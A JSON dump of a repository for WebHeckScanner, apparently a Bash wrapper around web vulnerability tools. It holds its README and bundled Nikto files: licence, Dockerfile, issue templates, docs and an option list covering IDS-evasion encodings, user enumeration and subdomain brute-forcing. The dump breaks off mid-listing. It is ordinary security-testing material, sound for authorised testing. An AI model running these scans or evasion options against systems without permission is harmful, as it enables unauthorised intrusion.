[
  {
    "path": ".deepsource.toml",
    "content": "version = 1\n\n[[analyzers]]\nname = \"shell\"\nenabled = true\n\n[[analyzers]]\nname = \"python\"\nenabled = true\n\n  [analyzers.meta]\n  runtime_version = \"3.x.x\""
  },
  {
    "path": ".github/FUNDING.yml",
    "content": "# These are supported funding model platforms\n\npatreon: grahamzemel # Replace with a single Patreon username\n"
  },
  {
    "path": "README.md",
    "content": "# WebHeckScanner (v2.0)\nWritten by [Graham Zemel](https://grahamzemel.com), using Nikto, Nuclei, Sqlmap, Anew, Gau, and more!\n\nThis is a Bash script designed to scan web apps for vulnerabilities using advanced tools while maintaining efficiency  \n\n# Installation\n### You must install and configure your directory as I have done or change the code if you have tools in your path already\n```\ngit clone https://github.com/grahamzemel/WebHeckScanner\n\ncd WebHeckScanner\n```\nMake sure all tools are installed before continuing\n```\nchmod +x webHeck.sh\n\nsudo ./webHeck.sh -n 'folder name to store results in' -u 'any url(keep the apostrophes)'\n```\nNote: Upon running this command with the same -n value, or name, it will delete the previous test.\n\nIf there are any permission errors running the tool files, run ```chmod +x ${toolfile}``` or ```sudo chmod +x ${toolfile}```.  \nIf there are any errors with the file system or installing, make sure the directory tree matches the one below.  \n# Tools Utilized:\n### Larger tools stored in their own folders:\n\n[Sqlmap](https://github.com/sqlmapproject/sqlmap), a tool for testing SQL injection vulnerabilities which are some of the most dangerous.  \n[Nikto](https://github.com/sullo/nikto), a tool for scanning websites written in perl, easy to use, one of my favorites.  \n[Nuclei](https://github.com/projectdiscovery/nuclei) is likely the most customizable tool out there for web pentesting,\nthere's about a million different templates to scan with on Github.  \n\n### Solo files, small tools that are contained in 'req_solos/':  \n\n[Anew](https://github.com/tomnomnom/anew): File I/O modification through terminal.    \n[Gauplus](https://github.com/bp0lr/gauplus): 'Get All Urls Plus', outdated but still has useful properties.  \n[Gau](https://github.com/lc/gau): 'Get All Urls', similar to Subdomainer but I like this tool better.    \n[Httpx](https://github.com/projectdiscovery/httpx): Runs a bunch of probes for vulnerabilities, commonly used in combination with most of these tools.  \n[PV](https://github.com/a-j-wood/pv): 'Pipe Viewer', used by some of these tools to print the status of a current scan/process.  \n[WayBackUrls](https://github.com/tomnomnom/waybackurls): Neat tool that integrates the waybackmachine as a means of fetching old and possibly useful files that may contain credentials or source code.  \n\n# Directory Tree Graph  \nWebHeckScanner  \n-README.md  \n-webHeck.sh  \n-nikto/  \n-nuclei/  \n--nuclei  \n-sqlmap/  \n-req_solos/  \n--anew  \n--gau  \n--gauplus  \n--httpx  \n--pv  \n--waybackurls  \n"
  },
  {
    "path": "nikto/.dockerignore",
    "content": ".git\n.gitignore\n.gitattributes\n.editorconfig\n.github\nCOPYING\ndevdocs\ndocumentation\nREADME.md\n"
  },
  {
    "path": "nikto/.editorconfig",
    "content": "root = true\n\n[*]\ncharset = utf-8\nend_of_line = lf\ntrim_trailing_whitespace = true\ninsert_final_newline = true\n\n[*.{pl,plugin}]\nindent_style = space\nindent_size = 4\n\n[*.{xml,tmpl}]\nindent_style = space\nindent_size = 2\n"
  },
  {
    "path": "nikto/.gitattributes",
    "content": "*   text=auto eol=lf\n"
  },
  {
    "path": "nikto/.github/FUNDING.yml",
    "content": "patreon: sullo\n"
  },
  {
    "path": "nikto/.github/ISSUE_TEMPLATE/FeatureRequest.md",
    "content": "---\nname: Feature Request\nabout: Reqeust a new feature for Nikto\ntitle: 'Feature: '\nlabels: 'enhancement'\nassignees: ''\n\n---\n### Description\n\n### Links/Info\n\n"
  },
  {
    "path": "nikto/.github/ISSUE_TEMPLATE/TestRequest.md",
    "content": "---\nname: New Test \nabout: Reqeust a new test in Nikto\ntitle: 'Test Request: '\nlabels: 'check'\nassignees: ''\n\n---\n### Description\n\n### Path\n\n### Matching text (in response)\n\n### Links/Info\n\n"
  },
  {
    "path": "nikto/.github/ISSUE_TEMPLATE/bug_report.md",
    "content": "---\nname: Bug Report\nabout: Report an issue found in Nikto\ntitle: 'Bug: '\nlabels: bug\nassignees: ''\n\n---\n### Expected behavior\n\n### Actual behavior\n\n### Steps to reproduce\n\n1.\n2.\n3.\n\n### Nikto version\n\nRun:\n\n```\n./nikto.pl -Version\n```\n\nand paste the output here.\n\n### Further technical info\n\nE.g. you can obtain Nikto debug output by running `-D D` and redirecting to a file.\nYou may also scrub the output of hostnames and IPs by specifying `-D DS`.\n"
  },
  {
    "path": "nikto/.github/ISSUE_TEMPLATE/config.yml",
    "content": "blank_issues_enabled: false\n"
  },
  {
    "path": "nikto/.github/ISSUE_TEMPLATE/false_positive_negative_report.md",
    "content": "---\nname: False positive / negative Report\nabout: Report a false positive / negative found by Nikto\ntitle: 'False Positive/Negative: '\nlabels: bug\nassignees: ''\n\n---\n\n### Output of suspected false positive / negative\n\nPost any useful information like the ID of the test causing the false positive.\n\n### Debug output\n\nRun:\n\n```\n./nikto.pl -host targethost -Save false_positive\n```\n\nThis saves all positive responses to a new `false_positive` directory. Afterwards look\nfor the related ID of the false positive / negative and paste it below.\n"
  },
  {
    "path": "nikto/.gitignore",
    "content": "*.komodoproject\n/.komodotools/\n/*.bbprojectd/\n*.sublime-project\n*.sublime-workspace\ntags\nnikto.conf\n"
  },
  {
    "path": "nikto/COPYING",
    "content": "                    GNU GENERAL PUBLIC LICENSE\n                       Version 2, June 1991\n\n Copyright (C) 1989, 1991 Free Software Foundation, Inc.,\n 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n                            Preamble\n\n  The licenses for most software are designed to take away your\nfreedom to share and change it.  By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users.  This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it.  (Some other Free Software Foundation software is covered by\nthe GNU Lesser General Public License instead.)  You can apply it to\nyour programs, too.\n\n  When we speak of free software, we are referring to freedom, not\nprice.  Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthis service if you wish), that you receive source code or can get it\nif you want it, that you can change the software or use pieces of it\nin new free programs; and that you know you can do these things.\n\n  To protect your rights, we need to make restrictions that forbid\nanyone to deny you these rights or to ask you to surrender the rights.\nThese restrictions translate to certain responsibilities for you if you\ndistribute copies of the software, or if you modify it.\n\n  For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must give the recipients all the rights that\nyou have.  You must make sure that they, too, receive or can get the\nsource code.  And you must show them these terms so they know their\nrights.\n\n  We protect your rights with two steps: (1) copyright the software, and\n(2) offer you this license which gives you legal permission to copy,\ndistribute and/or modify the software.\n\n  Also, for each author's protection and ours, we want to make certain\nthat everyone understands that there is no warranty for this free\nsoftware.  If the software is modified by someone else and passed on, we\nwant its recipients to know that what they have is not the original, so\nthat any problems introduced by others will not reflect on the original\nauthors' reputations.\n\n  Finally, any free program is threatened constantly by software\npatents.  We wish to avoid the danger that redistributors of a free\nprogram will individually obtain patent licenses, in effect making the\nprogram proprietary.  To prevent this, we have made it clear that any\npatent must be licensed for everyone's free use or not licensed at all.\n\n  The precise terms and conditions for copying, distribution and\nmodification follow.\n\n                    GNU GENERAL PUBLIC LICENSE\n   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n  0. This License applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed\nunder the terms of this General Public License.  The \"Program\", below,\nrefers to any such program or work, and a \"work based on the Program\"\nmeans either the Program or any derivative work under copyright law:\nthat is to say, a work containing the Program or a portion of it,\neither verbatim or with modifications and/or translated into another\nlanguage.  (Hereinafter, translation is included without limitation in\nthe term \"modification\".)  Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not\ncovered by this License; they are outside its scope.  The act of\nrunning the Program is not restricted, and the output from the Program\nis covered only if its contents constitute a work based on the\nProgram (independent of having been made by running the Program).\nWhether that is true depends on what the Program does.\n\n  1. You may copy and distribute verbatim copies of the Program's\nsource code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate\ncopyright notice and disclaimer of warranty; keep intact all the\nnotices that refer to this License and to the absence of any warranty;\nand give any other recipients of the Program a copy of this License\nalong with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and\nyou may at your option offer warranty protection in exchange for a fee.\n\n  2. You may modify your copy or copies of the Program or any portion\nof it, thus forming a work based on the Program, and copy and\ndistribute such modifications or work under the terms of Section 1\nabove, provided that you also meet all of these conditions:\n\n    a) You must cause the modified files to carry prominent notices\n    stating that you changed the files and the date of any change.\n\n    b) You must cause any work that you distribute or publish, that in\n    whole or in part contains or is derived from the Program or any\n    part thereof, to be licensed as a whole at no charge to all third\n    parties under the terms of this License.\n\n    c) If the modified program normally reads commands interactively\n    when run, you must cause it, when started running for such\n    interactive use in the most ordinary way, to print or display an\n    announcement including an appropriate copyright notice and a\n    notice that there is no warranty (or else, saying that you provide\n    a warranty) and that users may redistribute the program under\n    these conditions, and telling the user how to view a copy of this\n    License.  (Exception: if the Program itself is interactive but\n    does not normally print such an announcement, your work based on\n    the Program is not required to print an announcement.)\n\nThese requirements apply to the modified work as a whole.  If\nidentifiable sections of that work are not derived from the Program,\nand can be reasonably considered independent and separate works in\nthemselves, then this License, and its terms, do not apply to those\nsections when you distribute them as separate works.  But when you\ndistribute the same sections as part of a whole which is a work based\non the Program, the distribution of the whole must be on the terms of\nthis License, whose permissions for other licensees extend to the\nentire whole, and thus to each and every part regardless of who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest\nyour rights to work written entirely by you; rather, the intent is to\nexercise the right to control the distribution of derivative or\ncollective works based on the Program.\n\nIn addition, mere aggregation of another work not based on the Program\nwith the Program (or with a work based on the Program) on a volume of\na storage or distribution medium does not bring the other work under\nthe scope of this License.\n\n  3. You may copy and distribute the Program (or a work based on it,\nunder Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you also do one of the following:\n\n    a) Accompany it with the complete corresponding machine-readable\n    source code, which must be distributed under the terms of Sections\n    1 and 2 above on a medium customarily used for software interchange; or,\n\n    b) Accompany it with a written offer, valid for at least three\n    years, to give any third party, for a charge no more than your\n    cost of physically performing source distribution, a complete\n    machine-readable copy of the corresponding source code, to be\n    distributed under the terms of Sections 1 and 2 above on a medium\n    customarily used for software interchange; or,\n\n    c) Accompany it with the information you received as to the offer\n    to distribute corresponding source code.  (This alternative is\n    allowed only for noncommercial distribution and only if you\n    received the program in object code or executable form with such\n    an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for\nmaking modifications to it.  For an executable work, complete source\ncode means all the source code for all modules it contains, plus any\nassociated interface definition files, plus the scripts used to\ncontrol compilation and installation of the executable.  However, as a\nspecial exception, the source code distributed need not include\nanything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component\nitself accompanies the executable.\n\nIf distribution of executable or object code is made by offering\naccess to copy from a designated place, then offering equivalent\naccess to copy the source code from the same place counts as\ndistribution of the source code, even though third parties are not\ncompelled to copy the source along with the object code.\n\n  4. You may not copy, modify, sublicense, or distribute the Program\nexcept as expressly provided under this License.  Any attempt\notherwise to copy, modify, sublicense or distribute the Program is\nvoid, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under\nthis License will not have their licenses terminated so long as such\nparties remain in full compliance.\n\n  5. You are not required to accept this License, since you have not\nsigned it.  However, nothing else grants you permission to modify or\ndistribute the Program or its derivative works.  These actions are\nprohibited by law if you do not accept this License.  Therefore, by\nmodifying or distributing the Program (or any work based on the\nProgram), you indicate your acceptance of this License to do so, and\nall its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n  6. Each time you redistribute the Program (or any work based on the\nProgram), the recipient automatically receives a license from the\noriginal licensor to copy, distribute or modify the Program subject to\nthese terms and conditions.  You may not impose any further\nrestrictions on the recipients' exercise of the rights granted herein.\nYou are not responsible for enforcing compliance by third parties to\nthis License.\n\n  7. If, as a consequence of a court judgment or allegation of patent\ninfringement or for any other reason (not limited to patent issues),\nconditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License.  If you cannot\ndistribute so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you\nmay not distribute the Program at all.  For example, if a patent\nlicense would not permit royalty-free redistribution of the Program by\nall those who receive copies directly or indirectly through you, then\nthe only way you could satisfy both it and this License would be to\nrefrain entirely from distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under\nany particular circumstance, the balance of the section is intended to\napply and the section as a whole is intended to apply in other\ncircumstances.\n\nIt is not the purpose of this section to induce you to infringe any\npatents or other property right claims or to contest validity of any\nsuch claims; this section has the sole purpose of protecting the\nintegrity of the free software distribution system, which is\nimplemented by public license practices.  Many people have made\ngenerous contributions to the wide range of software distributed\nthrough that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing\nto distribute software through any other system and a licensee cannot\nimpose that choice.\n\nThis section is intended to make thoroughly clear what is believed to\nbe a consequence of the rest of this License.\n\n  8. If the distribution and/or use of the Program is restricted in\ncertain countries either by patents or by copyrighted interfaces, the\noriginal copyright holder who places the Program under this License\nmay add an explicit geographical distribution limitation excluding\nthose countries, so that distribution is permitted only in or among\ncountries not thus excluded.  In such case, this License incorporates\nthe limitation as if written in the body of this License.\n\n  9. The Free Software Foundation may publish revised and/or new versions\nof the General Public License from time to time.  Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\nEach version is given a distinguishing version number.  If the Program\nspecifies a version number of this License which applies to it and \"any\nlater version\", you have the option of following the terms and conditions\neither of that version or of any later version published by the Free\nSoftware Foundation.  If the Program does not specify a version number of\nthis License, you may choose any version ever published by the Free Software\nFoundation.\n\n  10. If you wish to incorporate parts of the Program into other free\nprograms whose distribution conditions are different, write to the author\nto ask for permission.  For software which is copyrighted by the Free\nSoftware Foundation, write to the Free Software Foundation; we sometimes\nmake exceptions for this.  Our decision will be guided by the two goals\nof preserving the free status of all derivatives of our free software and\nof promoting the sharing and reuse of software generally.\n\n                            NO WARRANTY\n\n  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY\nFOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN\nOTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES\nPROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,\nREPAIR OR CORRECTION.\n\n  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR\nREDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED\nTO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY\nYOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER\nPROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n\n                     END OF TERMS AND CONDITIONS\n\n            How to Apply These Terms to Your New Programs\n\n  If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n  To do so, attach the following notices to the program.  It is safest\nto attach them to the start of each source file to most effectively\nconvey the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n    <one line to give the program's name and a brief idea of what it does.>\n    Copyright (C) <year>  <name of author>\n\n    This program is free software; you can redistribute it and/or modify\n    it under the terms of the GNU General Public License as published by\n    the Free Software Foundation; either version 2 of the License, or\n    (at your option) any later version.\n\n    This program is distributed in the hope that it will be useful,\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n    GNU General Public License for more details.\n\n    You should have received a copy of the GNU General Public License along\n    with this program; if not, write to the Free Software Foundation, Inc.,\n    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this\nwhen it starts in an interactive mode:\n\n    Gnomovision version 69, Copyright (C) year name of author\n    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n    This is free software, and you are welcome to redistribute it\n    under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License.  Of course, the commands you use may\nbe called something other than `show w' and `show c'; they could even be\nmouse-clicks or menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your\nschool, if any, to sign a \"copyright disclaimer\" for the program, if\nnecessary.  Here is a sample; alter the names:\n\n  Yoyodyne, Inc., hereby disclaims all copyright interest in the program\n  `Gnomovision' (which makes passes at compilers) written by James Hacker.\n\n  <signature of Ty Coon>, 1 April 1989\n  Ty Coon, President of Vice\n\nThis General Public License does not permit incorporating your program into\nproprietary programs.  If your program is a subroutine library, you may\nconsider it more useful to permit linking proprietary applications with the\nlibrary.  If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License.\n"
  },
  {
    "path": "nikto/Dockerfile",
    "content": "FROM alpine:3.15\n\nLABEL version=\"2.1.6\" \\\n      author=\"Author Paul Sec (https://github.com/PaulSec), Nikto User https://github.com/drwetter\" \\\n      docker_build=\"docker build -t sullo/nikto:2.1.6 .\" \\\n      docker_run_basic=\"docker run --rm sullo/nikto:2.1.6 -h http://www.example.com\" \\\n      docker_run_advanced=\"docker run --rm -v $(pwd):/tmp sullo/nikto:2.1.6 -h http://www.example.com -o /tmp/out.json\"\n\nCOPY [\"program/\", \"/nikto\"]\n\nENV  PATH=${PATH}:/nikto\n\nRUN echo 'Installing packages for Nikto.' \\\n  && apk add --update --no-cache --virtual .build-deps \\\n     perl \\\n     perl-net-ssleay \\\n  && echo 'Creating the nikto group.' \\\n  && addgroup nikto \\\n  && echo 'Creating the nikto user.' \\\n  && adduser -G nikto -g \"Nikto user\" -s /bin/sh -D nikto \\\n  && echo 'Changing the ownership.' \\\n  && chown -R nikto.nikto /nikto \\\n  && echo 'Finishing image.'\n\nUSER nikto\n\nENTRYPOINT [\"nikto.pl\"]\n"
  },
  {
    "path": "nikto/README.md",
    "content": "\nnikto\n=====\n[![alt text](https://cirt.net/images/patreon.png \"Become a patron of Nikto!\")](https://www.patreon.com/sullo)\n\n\nNikto web server scanner  - https://cirt.net/Nikto2\n\nFull documentation - https://github.com/sullo/nikto/wiki\n\nRun normally:\n\n~~~\ngit clone https://github.com/sullo/nikto\n\n# Main script is in program/\ncd nikto/program\n\n# Check out the 2.5.0 branch\ngit checkout nikto-2.5.0\n\n# Run using the shebang interpreter\n./nikto.pl -h http://www.example.com\n\n# Run using perl (if you forget to chmod)\nperl nikto.pl -h http://www.example.com\n~~~\n\nRun as a Docker container:\n\n~~~bash\ngit clone https://github.com/sullo/nikto.git\ncd nikto\ndocker build -t sullo/nikto .\n\n# Call it without arguments to display the full help\ndocker run --rm sullo/nikto\n\n# Basic usage\ndocker run --rm sullo/nikto -h http://www.example.com\n\n# To save the report in a specific format, mount /tmp as a volume:\ndocker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json\n~~~\n\nBasic usage:\n\n```\n   Options:\n       -ask+               Whether to ask about submitting updates\n                               yes   Ask about each (default)\n                               no    Don't ask, don't send\n                               auto  Don't ask, just send\n       -Cgidirs+           Scan these CGI dirs: \"none\", \"all\", or values like \"/cgi/ /cgi-a/\"\n       -config+            Use this config file\n       -Display+           Turn on/off display outputs:\n                               1     Show redirects\n                               2     Show cookies received\n                               3     Show all 200/OK responses\n                               4     Show URLs which require authentication\n                               D     Debug output\n                               E     Display all HTTP errors\n                               P     Print progress to STDOUT\n                               S     Scrub output of IPs and hostnames\n                               V     Verbose output\n       -dbcheck           Check database and other key files for syntax errors\n       -evasion+          Encoding technique:\n                               1     Random URI encoding (non-UTF8)\n                               2     Directory self-reference (/./)\n                               3     Premature URL ending\n                               4     Prepend long random string\n                               5     Fake parameter\n                               6     TAB as request spacer\n                               7     Change the case of the URL\n                               8     Use Windows directory separator (\\)\n                               A     Use a carriage return (0x0d) as a request spacer\n                               B     Use binary value 0x0b as a request spacer\n        -Format+           Save file (-o) format:\n                               csv   Comma-separated-value\n                               htm   HTML Format\n                               msf+  Log to Metasploit\n                               nbe   Nessus NBE format\n                               txt   Plain text\n                               xml   XML Format\n                               (if not specified the format will be taken from the file extension passed to -output)\n       -Help              Extended help information\n       -host+             Target host\n       -IgnoreCode        Ignore Codes--treat as negative responses\n       -id+               Host authentication to use, format is id:pass or id:pass:realm\n       -key+              Client certificate key file\n       -list-plugins      List all available plugins, perform no testing\n       -maxtime+          Maximum testing time per host\n       -mutate+           Guess additional file names:\n                               1     Test all files with all root directories\n                               2     Guess for password file names\n                               3     Enumerate user names via Apache (/~user type requests)\n                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)\n                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain\n                               6     Attempt to guess directory names from the supplied dictionary file\n       -mutate-options    Provide information for mutates\n       -nointeractive     Disables interactive features\n       -nolookup          Disables DNS lookups\n       -nossl             Disables the use of SSL\n       -no404             Disables nikto attempting to guess a 404 page\n       -output+           Write output to this file ('.' for auto-name)\n       -Pause+            Pause between tests (seconds, integer or float)\n       -Plugins+          List of plugins to run (default: ALL)\n       -port+             Port to use (default 80)\n       -RSAcert+          Client certificate file\n       -root+             Prepend root value to all requests, format is /directory\n       -Save              Save positive responses to this directory ('.' for auto-name)\n       -ssl               Force ssl mode on port\n       -Tuning+           Scan tuning:\n                               1     Interesting File / Seen in logs\n                               2     Misconfiguration / Default File\n                               3     Information Disclosure\n                               4     Injection (XSS/Script/HTML)\n                               5     Remote File Retrieval - Inside Web Root\n                               6     Denial of Service\n                               7     Remote File Retrieval - Server Wide\n                               8     Command Execution / Remote Shell\n                               9     SQL Injection\n                               0     File Upload\n                               a     Authentication Bypass\n                               b     Software Identification\n                               c     Remote Source Inclusion\n                               x     Reverse Tuning Options (i.e., include all except specified)\n       -timeout+          Timeout for requests (default 10 seconds)\n       -Userdbs           Load only user databases, not the standard databases\n                               all   Disable standard dbs and load only user dbs\n                               tests Disable only db_tests and load udb_tests\n       -until             Run until the specified time or duration\n       -update            Update databases and plugins from CIRT.net\n       -useproxy          Use the proxy defined in nikto.conf\n       -Version           Print plugin and database versions\n       -vhost+            Virtual host (for Host header)\n              + requires a value\n```\n\nLicense\n=======\nCopyright (C) 2001 Chris Sullo\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; version 2\nof the License only.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to\nFree Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n"
  },
  {
    "path": "nikto/devdocs/documentation_notes.txt",
    "content": "- Files -\ndoc.xml       -  Full Nikto 2 documentation as found on cirt.net\ndoc_short.xml -  Trimmed documentation as included in the Nikto source distribution\nmanpage.xml   -  Man page\n\n- Editing -\nThese file were written in DocBook format with the XML Mind editor, though any\neditor that can properly handle DocBook should work fine. If changes are made in\none file, it is possible they should be made in both--please check!\n\n- Updates -\nThe doc_short.xml should be exported in HTML one page with table of contents, and then\ncommitted to the Nikto 2 trunk space. The updated xml should be committed as well.\n\nUpdates to the full documentation should be committed in xml format, and a notification\nsent to sullo@cirt.net for update to the web site.\n\n- Links -\nDocBook:  http://www.docbook.org/\nXML Mind: http://www.xmlmind.com/xmleditor/\n\n- Commands -\nManual page: xmlto man manpage.xml\nSingle HTML: xmlto html-nochunks -m config.xsl doc.xml\nPaged HTML:  xmlto html -m config.xsl doc.xml\n"
  },
  {
    "path": "nikto/devdocs/perltidyrc",
    "content": "# perltidy options for nikto development\n# copy to ~/.perltidyrc\n-lp\n-vt=2\n-pt=2\n-cti=3\n-bar\n-nolq\n-l=100\n"
  },
  {
    "path": "nikto/documentation/config.xsl",
    "content": "<?xml version='1.0'?>\n<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n                xmlns:fo=\"http://www.w3.org/1999/XSL/Format\"\n                version=\"1.0\">\n   <xsl:param name=\"use.id.as.filename\" select=\"'1'\"/>\n   <xsl:param name=\"admon.graphics\" select=\"'1'\"/>\n   <xsl:param name=\"admon.graphics.path\"></xsl:param>\n   <xsl:param name=\"chunk.section.depth\" select=\"0\"></xsl:param>\n   <xsl:param name=\"html.stylesheet\" select=\"'doc.css'\"/>\n   <xsl:param name=\"make.valid.html\" select=\"'1'\"/>\n</xsl:stylesheet>\n"
  },
  {
    "path": "nikto/documentation/doc.css",
    "content": "body\n{\n   font-family: Tahoma, sans-serif;\n   font-size: 1em;\n   margin-left: 1em;\n   margin-right: 1em;\n}\n\n.screen\n{\n   font-family: monospace;\n   font-size: 1em;\n   display: block;\n   padding: 10px;\n   border: 1px solid #bbb;\n   background-color: #ddd;\n   color: #000;\n   overflow: auto;\n   margin: 0.5em 2em;\n}\n\n.programlisting\n{\n   font-family: monospace;\n   font-size: 1em;\n   display: block;\n   padding: 10px;\n   border: 1px solid #bbb;\n   background-color: #ddd;\n   color: #000;\n   overflow: auto;\n   margin: 0.5em 2em;\n}\n\ndiv.chapter div.titlepage h2\n{\n   font-size: 2em;\n   font-weight: bold;\n   text-align: left;\n   border-bottom: 1px solid black;\n   padding-bottom: 5px;\n}\n\ndiv.section div.titlepage h2\n{\n   font-size: 1.5em;\n   text-align: left;\n   background-color: beige;\n   border-bottom: 0px;\n   padding: 4px;\n}\n@media print\n{\ndiv.chapter div.titlepage h2 {page-break-before: always}\ndiv.section div.titlepage h2 {page-break-before: auto}\n.navheader {display: hidden}\n}\n\ndiv.section div.titlepage h3\n{\n   font-family: sans-serif;\n   font-size: 12pt;\n   text-align: left;\n   background-color: beige;\n}\n\n.note\n{\n   border: 1px solid black;\n   float: right;\n   width: 20em;\n}\n\nh1\n{\n   text-align: center;\n}\n"
  },
  {
    "path": "nikto/documentation/manpage.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE refentry PUBLIC \"-//OASIS//DTD DocBook XML V4.1.2//EN\" \"http://www.oasis-open.org/docbook/xml/4.1.2/docbookx.dtd\" [\n<!ENTITY description SYSTEM \"sections/description.xml\">\n<!ENTITY options SYSTEM \"sections/options.xml\">\n<!ENTITY files SYSTEM \"sections/files.xml\">\n<!ENTITY bugs SYSTEM \"sections/bugs.xml\">\n<!ENTITY authors SYSTEM \"sections/authors.xml\">\n<!ENTITY product \"nikto\">\n]>\n\n<refentry id=\"commands.nikto\">\n  <refentryinfo>\n    <productname>&product;</productname>\n  </refentryinfo>\n\n  <refmeta>\n    <refentrytitle>&product;</refentrytitle>\n    <manvolnum>1</manvolnum>\n    <refmiscinfo class=\"version\">2.1.2</refmiscinfo>\n    <refmiscinfo class=\"source\">http://www.cirt.net/</refmiscinfo>\n    <refmiscinfo class=\"manual\">Vulnerability Scanner</refmiscinfo>\n  </refmeta>\n\n  <refnamediv>\n    <refname>nikto</refname>\n    <refpurpose>Scan web server for known vulnerabilities</refpurpose>\n  </refnamediv>\n\n  <refsynopsisdiv>\n    <cmdsynopsis>\n      <command>/usr/local/bin/nikto</command>\n      <arg choice=\"opt\" rep=\"repeat\">options</arg>\n    </cmdsynopsis>\n  </refsynopsisdiv>\n\n  <refsect1>\n    <title>Description</title>\n    &description;\n </refsect1>\n\n  <refsect1>\n    <title>Options</title>\n    &options;\n  </refsect1>\n\n  <refsect1>\n    <title>Files</title>\n    &files;\n  </refsect1>\n\n  <refsect1>\n    <title>Bugs</title>\n    &bugs;\n  </refsect1>\n\n  <refsect1>\n    <title>Authors</title>\n    &authors;\n  </refsect1>\n\n  <refsect1>\n    <title>See also</title>\n    <para>\n      <simplelist type=\"inline\">\n        <member>\n          <ulink url=\"http://www.cirt.net/\">Nikto Homepage</ulink>\n        </member>\n      </simplelist>\n    </para>\n  </refsect1>\n</refentry>\n"
  },
  {
    "path": "nikto/documentation/nikto.1",
